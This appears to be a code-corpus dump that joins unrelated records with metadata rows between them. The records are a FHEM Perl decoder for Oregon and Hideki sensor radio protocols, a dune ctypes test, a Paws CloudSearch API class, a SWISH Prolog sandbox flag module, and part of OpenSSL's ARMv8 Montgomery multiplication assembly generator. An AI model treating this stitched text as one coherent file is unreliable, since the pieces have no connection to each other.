#
# Decode Oregon 3
#
sub decodeOrego3 {
my $msg = shift;
my $name = shift;
my @a = split("", $msg);
Log3 $name, 5, "CUL_REDIRECT decode Oregon 3 ($msg)";
my $newMSG = "";
my $bitData;
my $hlen = length($msg);
my $blen = $hlen * 4;
$bitData= unpack("B$blen", pack("H$hlen", $msg));
Log3 $name, 5, "bitdata: $bitData";
if (index($bitData,"11110101") != -1)
    { # Valid OSV3 detected!
Log3 $name, 5, "OSV3 protocol detected ($msg)";
my $message_start=index($bitData,"0101");
my $message_end=length($bitData)-8;
my $message_length = $message_end - $message_start;
my $idx=0;
my $osv2bits="";
my $osv2hex ="";
for ($idx=$message_start; $idx<$message_end; $idx=$idx+8)
{
if (length($bitData)-$idx < 16 )
{
last;
}
my $byte = "";
            $byte= substr($bitData,$idx,8); ## read the next 8 data bits
Log3 $name, 5, "$name: byte in order $byte ";
$byte = scalar reverse $byte;
Log3 $name, 5, "$name: byte reversed $byte , as hex: ".sprintf('%X', oct("0b$byte"))."\n";
#$osv2hex=$osv2hex.sprintf('%X', oct("0b$byte"));
            $osv2hex=$osv2hex.sprintf('%02X', oct("0b$byte")) ;
        }
        $osv2hex = sprintf("%02X", length($osv2hex)*4).$osv2hex;
if (length($osv2hex)*4 > 87) {
Log3 $name, 5, "CUL_REDIRECT: OSV3 protocol converted to hex: ($osv2hex) with length (".(length($osv2hex)*4).") bits \n";
return (1,$osv2hex);
} else {
Log3 $name, 5, "CUL_REDIRECT: ERROR: To short: OSV3 protocol converted to hex: ($osv2hex) with length (".(length($osv2hex)*4).") bits \n";
return (-1, "CUL_REDIRECT: ERROR: To short: OSV3 protocol converted to hex: ($osv2hex) with length (".(length($osv2hex)*4).") bits");
}
}
return (-1, "Not a origon 3 protocol");
}
sub decode_Hideki
{
my $msg = shift;
my $name = shift;
my @a = split("", $msg);
Log3 $name, 5, "CUL_REDIRECT decode Hideki ($msg)";
my $bitData;
my $hlen = length($msg);
my $blen = $hlen * 4;
$bitData= unpack("B$blen", pack("H$hlen", $msg));
Log3 $name, 5, "$name: search in $bitData \n";
my $message_start = index($bitData,"10101110");
my $length_min = 72;
my $length_max = 104;
if ($message_start >= 0 ) # 0x75 but in reverse order
{
Log3 $name, 5, "$name: Hideki protocol detected \n";
        # Todo: skip ahead by the minimum message length when searching for the start point
        # Todo: also pass the repetition on to the receiving module so it can be checked there
        my $message_end = index($bitData,"10101110",$message_start+18); # check for a second 0x75, at least 18 bits after the first 0x75
$message_end = length($bitData) if ($message_end == -1);
my $message_length = $message_end - $message_start;
return (-1,"message is to short") if ($message_length < $length_min );
return (-1,"message is to long") if ($message_length > $length_max );
my $hidekihex;
my $idx;
for ($idx=$message_start; $idx<$message_end; $idx=$idx+9)
{
my $byte = "";
$byte= substr($bitData,$idx,8); ## Ignore every 9th bit
Log3 $name, 5, "$name: byte in order $byte ";
$byte = scalar reverse $byte;
Log3 $name, 5, "$name: byte reversed $byte , as hex: ".sprintf('%X', oct("0b$byte"))."\n";
$hidekihex=$hidekihex.sprintf('%02X', oct("0b$byte"));
}
Log3 $name, 4, "$name: hideki protocol converted to hex: $hidekihex with " .$message_length ." bits, messagestart $message_start";
return (1,$hidekihex); ## Return only the original bits, include length
}
return (-1,"Not a hideki protocol");
}
# Function which dispatches a message if needed.
sub CUL_REDIRECT_Dispatch($$$)
{
my ($hash, $rmsg,$dmsg) = @_;
my $name = $hash->{NAME};
Log3 $name, 5, "converted Data to ($dmsg)";
#if (!defined($hash->{DMSG})) {
# $hash->{DMSG} = "";
#}
    #Dispatch only if the message differs from the previous one, or if more than a second has passed since the last dispatch
if (($hash->{RAWMSG} ne $dmsg) || ($hash->{TIME}+1 < time()) ) {
#$hash->{MSGCNT}++;
$hash->{TIME} = time();
#$hash->{DMSG} = $dmsg;
#$hash->{IODEV} = "RFXCOM";
my $OregonClientMatch=index($hash->{Clients},"OREGON");
if ($OregonClientMatch == -1) {
# Append Clients and MatchList for CUL
$hash->{Clients} = $hash->{Clients}.":OREGON:";
$hash->{MatchList}{"C:OREGON"} = "^(3[8-9A-F]|[4-6][0-9A-F]|7[0-8]).*";
}
my $HidekiClientMatch=index($hash->{Clients},"Hideki");
if ($HidekiClientMatch == -1) {
# Append Clients and MatchList for CUL
$hash->{Clients} = $hash->{Clients}.":Hideki:";
$hash->{MatchList}{"C:Hideki"} = "^P12#75[A-F0-9]{17,30}";
}
readingsSingleUpdate($hash, "state", $hash->{READINGS}{state}{VAL}, 0);
$hash->{RAWMSG} = $rmsg;
my %addvals = (RAWMSG => $rmsg, DMSG => $dmsg);
Dispatch($hash, $dmsg, \%addvals); ## Dispatch to other Modules
} else {
Log3 $name, 1, "Dropped ($dmsg) due to short time or equal msg";
}
}
###################################
sub
CUL_REDIRECT_Parse($$)
{
my ($hash, $msg) = @_;
$msg = substr($msg, 1);
my @a = split("", $msg);
my $name = $hash->{NAME};
my $rssi;
my $l = length($msg);
my $dmsg;
my $message_dispatched=FALSE;
$rssi = substr($msg, $l-2, 2);
undef($rssi) if ($rssi eq "00");
if (defined($rssi))
{
$rssi = hex($rssi);
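        # The CUL reports a CC1101-style raw RSSI byte: two's complement in
        # half-dB steps with a -74 dB offset; the line below converts it to dBm.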
$rssi = ($rssi>=128 ? (($rssi-256)/2-74) : ($rssi/2-74)) if defined($rssi);
Log3 $name, 5, "CUL_REDIRECT ($msg) length: $l RSSI: $rssi";
} else {
Log3 $name, 5, "CUL_REDIRECT ($msg) length: $l";
}
if ("$a[0]" eq "m") {
# Orego2
Log3 $name, 5, "CUL_REDIRECT ($msg) match Manchester COODE length: $l";
my ($rcode,$res) = decodeOrego2(substr($msg, 1), $name);
if ($rcode != -1) {
$dmsg = $res;
Log3 $name, 5, "$name Dispatch now to Oregon Module.";
CUL_REDIRECT_Dispatch($hash,$msg,$dmsg);
$message_dispatched=TRUE;
}
($rcode,$res) = decodeOrego3(substr($msg, 1), $name);
if ($rcode != -1) {
$dmsg = $res;
Log3 $name, 5, "$name Dispatch now to Oregon Module.";
CUL_REDIRECT_Dispatch($hash,$msg,$dmsg);
$message_dispatched=TRUE;
}
($rcode,$res) = decode_Hideki(substr($msg, 1), $name);
if ($rcode != -1) {
$dmsg = 'P12#' . $res;
Log3 $name, 5, "$name Dispatch now to Hideki Module.";
CUL_REDIRECT_Dispatch($hash,$msg,$dmsg);
$message_dispatched=TRUE;
}
if ($rcode == -1) {
Log3 $name, 5, "protocol does not match, ignore received package (" . substr($msg, 1) . ") Reason: $res";
return "";
}
}
if ($message_dispatched == FALSE) {
return undef;
}
return "";
}
1;
=pod
=begin html
<a name="CUL_REDIRECT"></a>
<h3>CUL_REDIRECT</h3>
<ul>
  The CUL_REDIRECT module receives additional protocols from CUL<br>
  and redirects them to other modules.
<br>
<a name="CUL_REDIRECT_Parse"></a>
</ul>
=end html
=begin html_DE
<a name="CUL_REDIRECT"></a>
<h3>CUL_REDIRECT</h3>
<ul>
Das CUL_REDIRECT Modul empfängt weitere Protokolle vom CUL<br>
und leitet diese an die entsprechenden Module weiter.
<br>
<a name="CUL_REDIRECT_Parse"></a>
</ul>
=end html_DE
=cut
| 29.458213 | 151 | 0.589806 |
ed28b55a828ac69dfda2b7cc090e41218e10b75d | 494 | t | Perl | test/blackbox-tests/test-cases/ctypes/exe-vendored-override-types-generated.t/run.t | mndrix/dune | 30b84ff370351b13f05db34fd952dfe5d0249bcb | [
"MIT"
] | 245 | 2016-12-02T14:13:32.000Z | 2018-01-14T20:00:40.000Z | test/blackbox-tests/test-cases/ctypes/exe-vendored-override-types-generated.t/run.t | mndrix/dune | 30b84ff370351b13f05db34fd952dfe5d0249bcb | [
"MIT"
] | 380 | 2017-01-28T18:46:52.000Z | 2018-01-17T13:34:51.000Z | test/blackbox-tests/test-cases/ctypes/exe-vendored-override-types-generated.t/run.t | mndrix/dune | 30b84ff370351b13f05db34fd952dfe5d0249bcb | [
"MIT"
] | 59 | 2016-12-02T13:58:19.000Z | 2018-01-06T18:23:02.000Z | Generate cstubs for a "vendored" library.
We have a dummy C library hosted entirely in the 'vendor' directory and use
the ctypes instrumentation and description language to generate bindings for
it.
This is the version that builds into an executable.
This test is identical to exe-vendored.t except it overrides the
generated_types stanza field.
$ LIBEX=$(realpath "$PWD/../libexample")
$ TARGET=./vendor
$ mkdir -p $TARGET && install $LIBEX/* $TARGET
$ dune exec ./example.exe
4
| 29.058824 | 76 | 0.748988 |
ed60f768970356253e6d17aa55dc1f8aa860420a | 1,836 | pm | Perl | auto-lib/Paws/CloudSearch/DeleteIndexField.pm | agimenez/aws-sdk-perl | 9c4dff7d1af2ff0210c28ca44fb9e92bc625712b | [
"Apache-2.0"
] | 2 | 2016-09-22T09:18:33.000Z | 2017-06-20T01:36:58.000Z | auto-lib/Paws/CloudSearch/DeleteIndexField.pm | cah-rfelsburg/paws | de9ffb8d49627635a2da588066df26f852af37e4 | [
"Apache-2.0"
] | null | null | null | auto-lib/Paws/CloudSearch/DeleteIndexField.pm | cah-rfelsburg/paws | de9ffb8d49627635a2da588066df26f852af37e4 | [
"Apache-2.0"
] | null | null | null |
package Paws::CloudSearch::DeleteIndexField;
use Moose;
has DomainName => (is => 'ro', isa => 'Str', required => 1);
has IndexFieldName => (is => 'ro', isa => 'Str', required => 1);
use MooseX::ClassAttribute;
class_has _api_call => (isa => 'Str', is => 'ro', default => 'DeleteIndexField');
class_has _returns => (isa => 'Str', is => 'ro', default => 'Paws::CloudSearch::DeleteIndexFieldResponse');
class_has _result_key => (isa => 'Str', is => 'ro', default => 'DeleteIndexFieldResult');
1;
### main pod documentation begin ###
=head1 NAME
Paws::CloudSearch::DeleteIndexField - Arguments for method DeleteIndexField on Paws::CloudSearch
=head1 DESCRIPTION
This class represents the parameters used for calling the method DeleteIndexField on the
Amazon CloudSearch service. Use the attributes of this class
as arguments to method DeleteIndexField.
You shouldn't make instances of this class. Each attribute should be used as a named argument in the call to DeleteIndexField.
As an example:
$service_obj->DeleteIndexField(Att1 => $value1, Att2 => $value2, ...);
Values for attributes that are native types (Int, String, Float, etc) can passed as-is (scalar values). Values for complex Types (objects) can be passed as a HashRef. The keys and values of the hashref will be used to instance the underlying object.
=head1 ATTRIBUTES
=head2 B<REQUIRED> DomainName => Str
=head2 B<REQUIRED> IndexFieldName => Str
The name of the index field your want to remove from the domain's
indexing options.
=head1 SEE ALSO
This class forms part of L<Paws>, documenting arguments for method DeleteIndexField in L<Paws::CloudSearch>
=head1 BUGS and CONTRIBUTIONS
The source code is located here: https://github.com/pplu/aws-sdk-perl
Please report bugs to: https://github.com/pplu/aws-sdk-perl/issues
=cut
| 29.142857 | 249 | 0.732571 |
ed7a6ca24559690fda6f6a85ca3fb515cb6addbc | 1,817 | pl | Perl | lib/flags.pl | bflagg/swish | d357234613182abcc2953d5b827d367616be8502 | [
"BSD-2-Clause"
] | 464 | 2015-01-01T13:56:55.000Z | 2022-03-08T01:44:04.000Z | lib/flags.pl | bflagg/swish | d357234613182abcc2953d5b827d367616be8502 | [
"BSD-2-Clause"
] | 129 | 2015-01-20T00:19:46.000Z | 2022-02-14T19:49:17.000Z | lib/flags.pl | bflagg/swish | d357234613182abcc2953d5b827d367616be8502 | [
"BSD-2-Clause"
] | 132 | 2015-01-02T10:02:47.000Z | 2022-03-29T10:34:51.000Z | /* Part of SWISH
Author: Jan Wielemaker
E-mail: J.Wielemaker@vu.nl
WWW: http://www.swi-prolog.org
Copyright (c) 2015, VU University Amsterdam
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in
the documentation and/or other materials provided with the
distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
*/
:- module(swish_flags, []).
:- multifile
sandbox:safe_primitive/1.
sandbox:safe_primitive(set_prolog_flag(Flag, _Value)) :-
safe_prolog_flag(Flag).
sandbox:safe_primitive(current_prolog_flag(Flag, _Value)) :-
safe_prolog_flag(Flag).
safe_prolog_flag(occurs_check).
| 39.5 | 72 | 0.741332 |
ed77a8a152a226b98b153a7ec93a7db29b61daf5 | 37,204 | pl | Perl | crypto/bn/asm/armv8-mont.pl | JamesWP/openssl | 922241de76dce66a04e0217bfc270a5228b694f3 | [
"Apache-2.0"
] | 4 | 2017-07-18T18:24:43.000Z | 2018-01-28T19:26:37.000Z | crypto/bn/asm/armv8-mont.pl | JamesWP/openssl | 922241de76dce66a04e0217bfc270a5228b694f3 | [
"Apache-2.0"
] | 1 | 2016-02-27T16:30:29.000Z | 2016-02-27T19:50:04.000Z | crypto/bn/asm/armv8-mont.pl | JamesWP/openssl | 922241de76dce66a04e0217bfc270a5228b694f3 | [
"Apache-2.0"
] | 3 | 2016-02-27T14:35:30.000Z | 2017-03-13T03:38:09.000Z | #! /usr/bin/env perl
# Copyright 2015-2016 The OpenSSL Project Authors. All Rights Reserved.
#
# Licensed under the Apache License 2.0 (the "License"). You may not use
# this file except in compliance with the License. You can obtain a copy
# in the file LICENSE in the source distribution or at
# https://www.openssl.org/source/license.html
# ====================================================================
# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
# project. The module is, however, dual licensed under OpenSSL and
# CRYPTOGAMS licenses depending on where you obtain it. For further
# details see http://www.openssl.org/~appro/cryptogams/.
# ====================================================================
# March 2015
#
# "Teaser" Montgomery multiplication module for ARMv8. Needs more
# work. While it does improve RSA sign performance by 20-30% (less for
# longer keys) on most processors, for some reason RSA2048 is not
# faster and RSA4096 goes 15-20% slower on Cortex-A57. Multiplication
# instruction issue rate is limited on processor in question, meaning
# that dedicated squaring procedure is a must. Well, actually all
# contemporary AArch64 processors seem to have limited multiplication
# issue rate, i.e. they can't issue multiplication every cycle, which
# explains moderate improvement coefficients in comparison to
# compiler-generated code. Recall that compiler is instructed to use
# umulh and therefore uses same amount of multiplication instructions
# to do the job. Assembly's edge is to minimize number of "collateral"
# instructions and of course instruction scheduling.
#
# April 2015
#
# Squaring procedure that handles lengths divisible by 8 improves
# RSA/DSA performance by 25-40-60% depending on processor and key
# length. Overall improvement coefficients are always positive in
# comparison to compiler-generated code. On Cortex-A57 improvement
# is still modest on longest key lengths, while others exhibit e.g.
# 50-70% improvement for RSA4096 sign. RSA2048 sign is ~25% faster
# on Cortex-A57 and ~60-100% faster on others.
# $output is the last argument if it looks like a file (it has an extension)
# $flavour is the first argument if it doesn't look like a file
my $output = $#ARGV >= 0 && $ARGV[$#ARGV] =~ m|\.\w+$| ? pop : undef;
my $flavour = $#ARGV >= 0 && $ARGV[0] !~ m|\.| ? shift : undef;
$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
( $xlate="${dir}arm-xlate.pl" and -f $xlate ) or
( $xlate="${dir}../../perlasm/arm-xlate.pl" and -f $xlate) or
die "can't locate arm-xlate.pl";
open OUT,"| \"$^X\" $xlate $flavour \"$output\""
or die "can't call $xlate: $1";
*STDOUT=*OUT;
($lo0,$hi0,$aj,$m0,$alo,$ahi,
$lo1,$hi1,$nj,$m1,$nlo,$nhi,
$ovf, $i,$j,$tp,$tj) = map("x$_",6..17,19..24);
# int bn_mul_mont(
$rp="x0"; # BN_ULONG *rp,
$ap="x1"; # const BN_ULONG *ap,
$bp="x2"; # const BN_ULONG *bp,
$np="x3"; # const BN_ULONG *np,
$n0="x4"; # const BN_ULONG *n0,
$num="x5"; # int num);
$code.=<<___;
.text
.globl bn_mul_mont
.type bn_mul_mont,%function
.align 5
bn_mul_mont:
tst $num,#7
b.eq __bn_sqr8x_mont
tst $num,#3
b.eq __bn_mul4x_mont
.Lmul_mont:
stp x29,x30,[sp,#-64]!
add x29,sp,#0
stp x19,x20,[sp,#16]
stp x21,x22,[sp,#32]
stp x23,x24,[sp,#48]
ldr $m0,[$bp],#8 // bp[0]
sub $tp,sp,$num,lsl#3
ldp $hi0,$aj,[$ap],#16 // ap[0..1]
lsl $num,$num,#3
ldr $n0,[$n0] // *n0
and $tp,$tp,#-16 // ABI says so
ldp $hi1,$nj,[$np],#16 // np[0..1]
mul $lo0,$hi0,$m0 // ap[0]*bp[0]
sub $j,$num,#16 // j=num-2
umulh $hi0,$hi0,$m0
mul $alo,$aj,$m0 // ap[1]*bp[0]
umulh $ahi,$aj,$m0
mul $m1,$lo0,$n0 // "tp[0]"*n0
mov sp,$tp // alloca
// (*) mul $lo1,$hi1,$m1 // np[0]*m1
umulh $hi1,$hi1,$m1
mul $nlo,$nj,$m1 // np[1]*m1
// (*) adds $lo1,$lo1,$lo0 // discarded
// (*) As for removal of first multiplication and addition
// instructions. The outcome of first addition is
// guaranteed to be zero, which leaves two computationally
// significant outcomes: it either carries or not. Then
// question is when does it carry? Is there alternative
// way to deduce it? If you follow operations, you can
// observe that condition for carry is quite simple:
// $lo0 being non-zero. So that carry can be calculated
// by adding -1 to $lo0. That's what next instruction does.
subs xzr,$lo0,#1 // (*)
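	// (*)	Concretely: m1 = lo0*n0 mod 2^64 with n0 = -np[0]^-1 mod 2^64,
	//	so lo(np[0]*m1) = 2^64-lo0 (mod 2^64); the discarded sum is zero
	//	modulo 2^64 and carries exactly when lo0 is non-zero, which is
	//	the condition the subtraction above reproduces in the carry flag.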
umulh $nhi,$nj,$m1
adc $hi1,$hi1,xzr
cbz $j,.L1st_skip
.L1st:
ldr $aj,[$ap],#8
adds $lo0,$alo,$hi0
sub $j,$j,#8 // j--
adc $hi0,$ahi,xzr
ldr $nj,[$np],#8
adds $lo1,$nlo,$hi1
mul $alo,$aj,$m0 // ap[j]*bp[0]
adc $hi1,$nhi,xzr
umulh $ahi,$aj,$m0
adds $lo1,$lo1,$lo0
mul $nlo,$nj,$m1 // np[j]*m1
adc $hi1,$hi1,xzr
umulh $nhi,$nj,$m1
str $lo1,[$tp],#8 // tp[j-1]
cbnz $j,.L1st
.L1st_skip:
adds $lo0,$alo,$hi0
sub $ap,$ap,$num // rewind $ap
adc $hi0,$ahi,xzr
adds $lo1,$nlo,$hi1
sub $np,$np,$num // rewind $np
adc $hi1,$nhi,xzr
adds $lo1,$lo1,$lo0
sub $i,$num,#8 // i=num-1
adcs $hi1,$hi1,$hi0
adc $ovf,xzr,xzr // upmost overflow bit
stp $lo1,$hi1,[$tp]
.Louter:
ldr $m0,[$bp],#8 // bp[i]
ldp $hi0,$aj,[$ap],#16
ldr $tj,[sp] // tp[0]
add $tp,sp,#8
mul $lo0,$hi0,$m0 // ap[0]*bp[i]
sub $j,$num,#16 // j=num-2
umulh $hi0,$hi0,$m0
ldp $hi1,$nj,[$np],#16
mul $alo,$aj,$m0 // ap[1]*bp[i]
adds $lo0,$lo0,$tj
umulh $ahi,$aj,$m0
adc $hi0,$hi0,xzr
mul $m1,$lo0,$n0
sub $i,$i,#8 // i--
// (*) mul $lo1,$hi1,$m1 // np[0]*m1
umulh $hi1,$hi1,$m1
mul $nlo,$nj,$m1 // np[1]*m1
// (*) adds $lo1,$lo1,$lo0
subs xzr,$lo0,#1 // (*)
umulh $nhi,$nj,$m1
cbz $j,.Linner_skip
.Linner:
ldr $aj,[$ap],#8
adc $hi1,$hi1,xzr
ldr $tj,[$tp],#8 // tp[j]
adds $lo0,$alo,$hi0
sub $j,$j,#8 // j--
adc $hi0,$ahi,xzr
adds $lo1,$nlo,$hi1
ldr $nj,[$np],#8
adc $hi1,$nhi,xzr
mul $alo,$aj,$m0 // ap[j]*bp[i]
adds $lo0,$lo0,$tj
umulh $ahi,$aj,$m0
adc $hi0,$hi0,xzr
mul $nlo,$nj,$m1 // np[j]*m1
adds $lo1,$lo1,$lo0
umulh $nhi,$nj,$m1
stur $lo1,[$tp,#-16] // tp[j-1]
cbnz $j,.Linner
.Linner_skip:
ldr $tj,[$tp],#8 // tp[j]
adc $hi1,$hi1,xzr
adds $lo0,$alo,$hi0
sub $ap,$ap,$num // rewind $ap
adc $hi0,$ahi,xzr
adds $lo1,$nlo,$hi1
sub $np,$np,$num // rewind $np
adcs $hi1,$nhi,$ovf
adc $ovf,xzr,xzr
adds $lo0,$lo0,$tj
adc $hi0,$hi0,xzr
adds $lo1,$lo1,$lo0
adcs $hi1,$hi1,$hi0
adc $ovf,$ovf,xzr // upmost overflow bit
stp $lo1,$hi1,[$tp,#-16]
cbnz $i,.Louter
// Final step. We see if result is larger than modulus, and
// if it is, subtract the modulus. But comparison implies
// subtraction. So we subtract modulus, see if it borrowed,
// and conditionally copy original value.
ldr $tj,[sp] // tp[0]
add $tp,sp,#8
ldr $nj,[$np],#8 // np[0]
subs $j,$num,#8 // j=num-1 and clear borrow
mov $ap,$rp
.Lsub:
sbcs $aj,$tj,$nj // tp[j]-np[j]
ldr $tj,[$tp],#8
sub $j,$j,#8 // j--
ldr $nj,[$np],#8
str $aj,[$ap],#8 // rp[j]=tp[j]-np[j]
cbnz $j,.Lsub
sbcs $aj,$tj,$nj
sbcs $ovf,$ovf,xzr // did it borrow?
str $aj,[$ap],#8 // rp[num-1]
ldr $tj,[sp] // tp[0]
add $tp,sp,#8
ldr $aj,[$rp],#8 // rp[0]
sub $num,$num,#8 // num--
nop
.Lcond_copy:
sub $num,$num,#8 // num--
csel $nj,$tj,$aj,lo // did it borrow?
ldr $tj,[$tp],#8
ldr $aj,[$rp],#8
stur xzr,[$tp,#-16] // wipe tp
stur $nj,[$rp,#-16]
cbnz $num,.Lcond_copy
csel $nj,$tj,$aj,lo
stur xzr,[$tp,#-8] // wipe tp
stur $nj,[$rp,#-8]
ldp x19,x20,[x29,#16]
mov sp,x29
ldp x21,x22,[x29,#32]
mov x0,#1
ldp x23,x24,[x29,#48]
ldr x29,[sp],#64
ret
.size bn_mul_mont,.-bn_mul_mont
___
{
########################################################################
# The following is an ARMv8 adaptation of sqrx8x_mont from the x86_64-mont5 module.
my ($a0,$a1,$a2,$a3,$a4,$a5,$a6,$a7)=map("x$_",(6..13));
my ($t0,$t1,$t2,$t3)=map("x$_",(14..17));
my ($acc0,$acc1,$acc2,$acc3,$acc4,$acc5,$acc6,$acc7)=map("x$_",(19..26));
my ($cnt,$carry,$topmost)=("x27","x28","x30");
my ($tp,$ap_end,$na0)=($bp,$np,$carry);
$code.=<<___;
.type __bn_sqr8x_mont,%function
.align 5
__bn_sqr8x_mont:
cmp $ap,$bp
b.ne __bn_mul4x_mont
.Lsqr8x_mont:
.inst 0xd503233f // paciasp
stp x29,x30,[sp,#-128]!
add x29,sp,#0
stp x19,x20,[sp,#16]
stp x21,x22,[sp,#32]
stp x23,x24,[sp,#48]
stp x25,x26,[sp,#64]
stp x27,x28,[sp,#80]
stp $rp,$np,[sp,#96] // offload rp and np
ldp $a0,$a1,[$ap,#8*0]
ldp $a2,$a3,[$ap,#8*2]
ldp $a4,$a5,[$ap,#8*4]
ldp $a6,$a7,[$ap,#8*6]
sub $tp,sp,$num,lsl#4
lsl $num,$num,#3
ldr $n0,[$n0] // *n0
mov sp,$tp // alloca
sub $cnt,$num,#8*8
b .Lsqr8x_zero_start
.Lsqr8x_zero:
sub $cnt,$cnt,#8*8
stp xzr,xzr,[$tp,#8*0]
stp xzr,xzr,[$tp,#8*2]
stp xzr,xzr,[$tp,#8*4]
stp xzr,xzr,[$tp,#8*6]
.Lsqr8x_zero_start:
stp xzr,xzr,[$tp,#8*8]
stp xzr,xzr,[$tp,#8*10]
stp xzr,xzr,[$tp,#8*12]
stp xzr,xzr,[$tp,#8*14]
add $tp,$tp,#8*16
cbnz $cnt,.Lsqr8x_zero
add $ap_end,$ap,$num
add $ap,$ap,#8*8
mov $acc0,xzr
mov $acc1,xzr
mov $acc2,xzr
mov $acc3,xzr
mov $acc4,xzr
mov $acc5,xzr
mov $acc6,xzr
mov $acc7,xzr
mov $tp,sp
str $n0,[x29,#112] // offload n0
// Multiply everything but a[i]*a[i]
.align 4
.Lsqr8x_outer_loop:
// a[1]a[0] (i)
// a[2]a[0]
// a[3]a[0]
// a[4]a[0]
// a[5]a[0]
// a[6]a[0]
// a[7]a[0]
// a[2]a[1] (ii)
// a[3]a[1]
// a[4]a[1]
// a[5]a[1]
// a[6]a[1]
// a[7]a[1]
// a[3]a[2] (iii)
// a[4]a[2]
// a[5]a[2]
// a[6]a[2]
// a[7]a[2]
// a[4]a[3] (iv)
// a[5]a[3]
// a[6]a[3]
// a[7]a[3]
// a[5]a[4] (v)
// a[6]a[4]
// a[7]a[4]
// a[6]a[5] (vi)
// a[7]a[5]
// a[7]a[6] (vii)
mul $t0,$a1,$a0 // lo(a[1..7]*a[0]) (i)
mul $t1,$a2,$a0
mul $t2,$a3,$a0
mul $t3,$a4,$a0
adds $acc1,$acc1,$t0 // t[1]+lo(a[1]*a[0])
mul $t0,$a5,$a0
adcs $acc2,$acc2,$t1
mul $t1,$a6,$a0
adcs $acc3,$acc3,$t2
mul $t2,$a7,$a0
adcs $acc4,$acc4,$t3
umulh $t3,$a1,$a0 // hi(a[1..7]*a[0])
adcs $acc5,$acc5,$t0
umulh $t0,$a2,$a0
adcs $acc6,$acc6,$t1
umulh $t1,$a3,$a0
adcs $acc7,$acc7,$t2
umulh $t2,$a4,$a0
stp $acc0,$acc1,[$tp],#8*2 // t[0..1]
adc $acc0,xzr,xzr // t[8]
adds $acc2,$acc2,$t3 // t[2]+lo(a[1]*a[0])
umulh $t3,$a5,$a0
adcs $acc3,$acc3,$t0
umulh $t0,$a6,$a0
adcs $acc4,$acc4,$t1
umulh $t1,$a7,$a0
adcs $acc5,$acc5,$t2
mul $t2,$a2,$a1 // lo(a[2..7]*a[1]) (ii)
adcs $acc6,$acc6,$t3
mul $t3,$a3,$a1
adcs $acc7,$acc7,$t0
mul $t0,$a4,$a1
adc $acc0,$acc0,$t1
mul $t1,$a5,$a1
adds $acc3,$acc3,$t2
mul $t2,$a6,$a1
adcs $acc4,$acc4,$t3
mul $t3,$a7,$a1
adcs $acc5,$acc5,$t0
umulh $t0,$a2,$a1 // hi(a[2..7]*a[1])
adcs $acc6,$acc6,$t1
umulh $t1,$a3,$a1
adcs $acc7,$acc7,$t2
umulh $t2,$a4,$a1
adcs $acc0,$acc0,$t3
umulh $t3,$a5,$a1
stp $acc2,$acc3,[$tp],#8*2 // t[2..3]
adc $acc1,xzr,xzr // t[9]
adds $acc4,$acc4,$t0
umulh $t0,$a6,$a1
adcs $acc5,$acc5,$t1
umulh $t1,$a7,$a1
adcs $acc6,$acc6,$t2
mul $t2,$a3,$a2 // lo(a[3..7]*a[2]) (iii)
adcs $acc7,$acc7,$t3
mul $t3,$a4,$a2
adcs $acc0,$acc0,$t0
mul $t0,$a5,$a2
adc $acc1,$acc1,$t1
mul $t1,$a6,$a2
adds $acc5,$acc5,$t2
mul $t2,$a7,$a2
adcs $acc6,$acc6,$t3
umulh $t3,$a3,$a2 // hi(a[3..7]*a[2])
adcs $acc7,$acc7,$t0
umulh $t0,$a4,$a2
adcs $acc0,$acc0,$t1
umulh $t1,$a5,$a2
adcs $acc1,$acc1,$t2
umulh $t2,$a6,$a2
stp $acc4,$acc5,[$tp],#8*2 // t[4..5]
adc $acc2,xzr,xzr // t[10]
adds $acc6,$acc6,$t3
umulh $t3,$a7,$a2
adcs $acc7,$acc7,$t0
mul $t0,$a4,$a3 // lo(a[4..7]*a[3]) (iv)
adcs $acc0,$acc0,$t1
mul $t1,$a5,$a3
adcs $acc1,$acc1,$t2
mul $t2,$a6,$a3
adc $acc2,$acc2,$t3
mul $t3,$a7,$a3
adds $acc7,$acc7,$t0
umulh $t0,$a4,$a3 // hi(a[4..7]*a[3])
adcs $acc0,$acc0,$t1
umulh $t1,$a5,$a3
adcs $acc1,$acc1,$t2
umulh $t2,$a6,$a3
adcs $acc2,$acc2,$t3
umulh $t3,$a7,$a3
stp $acc6,$acc7,[$tp],#8*2 // t[6..7]
adc $acc3,xzr,xzr // t[11]
adds $acc0,$acc0,$t0
mul $t0,$a5,$a4 // lo(a[5..7]*a[4]) (v)
adcs $acc1,$acc1,$t1
mul $t1,$a6,$a4
adcs $acc2,$acc2,$t2
mul $t2,$a7,$a4
adc $acc3,$acc3,$t3
umulh $t3,$a5,$a4 // hi(a[5..7]*a[4])
adds $acc1,$acc1,$t0
umulh $t0,$a6,$a4
adcs $acc2,$acc2,$t1
umulh $t1,$a7,$a4
adcs $acc3,$acc3,$t2
mul $t2,$a6,$a5 // lo(a[6..7]*a[5]) (vi)
adc $acc4,xzr,xzr // t[12]
adds $acc2,$acc2,$t3
mul $t3,$a7,$a5
adcs $acc3,$acc3,$t0
umulh $t0,$a6,$a5 // hi(a[6..7]*a[5])
adc $acc4,$acc4,$t1
umulh $t1,$a7,$a5
adds $acc3,$acc3,$t2
mul $t2,$a7,$a6 // lo(a[7]*a[6]) (vii)
adcs $acc4,$acc4,$t3
